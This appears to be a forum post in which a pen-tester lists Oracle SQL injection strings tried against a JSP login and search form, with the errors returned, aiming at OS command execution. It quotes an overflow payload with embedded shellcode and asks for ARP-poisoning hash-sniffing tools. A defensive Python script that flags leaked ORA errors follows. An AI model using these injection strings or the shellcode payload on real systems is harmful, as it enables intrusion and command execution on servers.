Hello,
This is my first post in this community; I hope I can help others too.
I'm pen-testing a host that has applications running in JSP with Oracle as a back-end. I found 2 SQL injections in this application, but I have not been able to exploit them... if some Oracle SQL injection master can help me

The two scripts are like this:
One is a login form.
Two is a search form, where one of the options (the city field) is vulnerable, so I believe it's an injection in a WHERE clause.
My objective is to use the Oracle database to execute commands on the server (I don't care about the data in the database).
If I try the following strings in the first one (login form) (reference:
http://www.securityfocus.com/infocus/1644):
;select username from all_users where ''x''=''x'
or exists (select 1 from sys.dual) and ''x''=''x'
union select username from all_users where ''x''=''x'
or ''x''=''x'' --'
I get: ORA-01756: quoted string not properly terminated
If I try the following strings in the first one (login form) (reference:
http://www.appsecinc.com/presentations/oracle_security.pdf):
UNION select password from DBA_USERS where 'q' = 'q'
I got: ORA-00907: missing right parenthesis
Which already looks better, since now it appears there is an unterminated parenthesis.
If I try the following strings in the first one (login form) (reference:
http://seclists.org/lists/pen-test/2001/Dec/0036.html)
(SELECT username FROM all_users WHERE 1=1)
I got an HTML access denied message (like when I type a wrong user or pass); it appears that subselects don't work.
') UNION SELECT username FROM all_users WHERE (''='
I got: ORA-00904: invalid column name
However, all_users is a valid table and username is a valid column.

1 - Why does this happen? Does someone know? How can I fix it?
I gained access to the host by another attack and compromised the database, and just out of curiosity I checked it, and it really exists:
USERNAME
SYS
SYSTEM
OUTLN
WMSYS
ORDSYS
ORDPLUGINS
MDSYS
CTXSYS
XDB
ANONYMOUS
WKSYS
WKPROXY
...
...
I also found an interesting reference (
http://security-papers.globint.com.ar/oracle_security/AdvancedSQLInjectionInOracleDatabases.pdf)
where the guy shows the possibility of executing an overflow via SQL injection, with a string like this for example:
A'||TO_CHAR(MDSYS.MD2.SDO_CODE_SIZE('AAAAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDDDDDDDDDDDDDEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEFFFFFFFFFFFFFFFFFFFFFFFFFFFFGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGGHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH'||CHR(131)||CHR(195)||CHR(9)||CHR(255)||CHR(227)||CHR(251)||CHR(90)||CHR(227)||CHR(120)||CHR(54)||CHR(141)||CHR(67)||CHR(19)||CHR(80)||chr(184)||chr(191)||chr(142)||chr(01)||chr(120)||chr(255)||chr(208)||chr(184)||chr(147)||chr(131)||chr(00)||chr(120)||chr(255)||chr(208)||'dir>c:\dir.txt'))--
2 - If I try it, I get ORA-00907: missing right parenthesis; does someone know how I could use it in my example?
3 - Even if it worked, he redirects the output to c:\dir.txt; can't it be sent to stdout (the web page returned from the query)?
4 - Does someone know a tool where, for example, I find a SQL injection, pass it to the tool, and it makes several tries to detect the right way to make the queries?

ps: Off topic, has someone already had success (or knows how to) compiling programs that use raw sockets/libpcap/libnet with cygwin (like compiling dsniff, ettercap, ...)?
ps2: Or do you know a good command-line password tool for Windows (that can be installed entirely from the command line) that can do ARP poisoning and filter password hashes like NTLM, Oracle, SQL Server, etc.?
Thank you a lot.
Cya
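The ORA-01756 / ORA-00907 / ORA-00904 messages quoted in this post are being echoed by the JSP application straight to the browser, which is both a disclosure problem and the signal a defender can alert on. The following is an added example, not code from the post or from the application being tested: it scans constructed request/response records (the field names `user`, `pass` and `city`, the request ids and the bodies are all invented for the example) and reports every response that leaks an Oracle error code, noting which request parameter carried SQL metacharacters.

```python
import re
from dataclasses import dataclass

# Oracle error codes quoted in the post above, with the message text the
# application leaked to the client. Constructed lookup table for this example.
ORA_ERRORS = {
    "ORA-01756": "quoted string not properly terminated",
    "ORA-00907": "missing right parenthesis",
    "ORA-00904": "invalid column name",
}
ORA_RE = re.compile(r"\bORA-(\d{5})\b")
# Fragments typical of the probes in the post: quotes, comment terminators,
# UNION/SELECT keywords.
SQLI_RE = re.compile(r"'|--|\bUNION\b|\bSELECT\b", re.IGNORECASE)

@dataclass
class Finding:
    request_id: str
    parameter: str   # parameter(s) with SQL metacharacters, or "-" if none
    ora_code: str
    description: str

def scan(records):
    """records: iterable of (request_id, {param: value}, response_body).
    Returns a Finding for every response body that echoes an ORA- code.
    A leaked code is reported even when no parameter looks hostile, because
    exposing database errors to the client is an issue on its own; the fix on
    the application side is bind variables plus a generic error page."""
    findings = []
    for request_id, params, body in records:
        codes = ["ORA-" + digits for digits in ORA_RE.findall(body)]
        if not codes:
            continue
        suspect = [p for p, v in params.items() if SQLI_RE.search(v)]
        for code in codes:
            desc = ORA_ERRORS.get(code, "unknown Oracle error")
            findings.append(Finding(request_id, ",".join(suspect) or "-", code, desc))
    return findings

# Constructed sample traffic modelled on the post: a login form and a search
# form whose "city" parameter sits in a WHERE clause.
SAMPLE = [
    ("r1", {"user": "bob", "pass": "hunter2"}, "<html>Access denied</html>"),
    ("r2", {"user": "or ''x''=''x'' --'", "pass": "x"},
     "Error: ORA-01756: quoted string not properly terminated"),
    ("r3", {"city": "') UNION SELECT username FROM all_users WHERE (''='"},
     "Error: ORA-00904: invalid column name"),
    ("r4", {"city": "Lisbon"}, "<html>3 results</html>"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f"{f.request_id} param={f.parameter} {f.ora_code}: {f.description}")
```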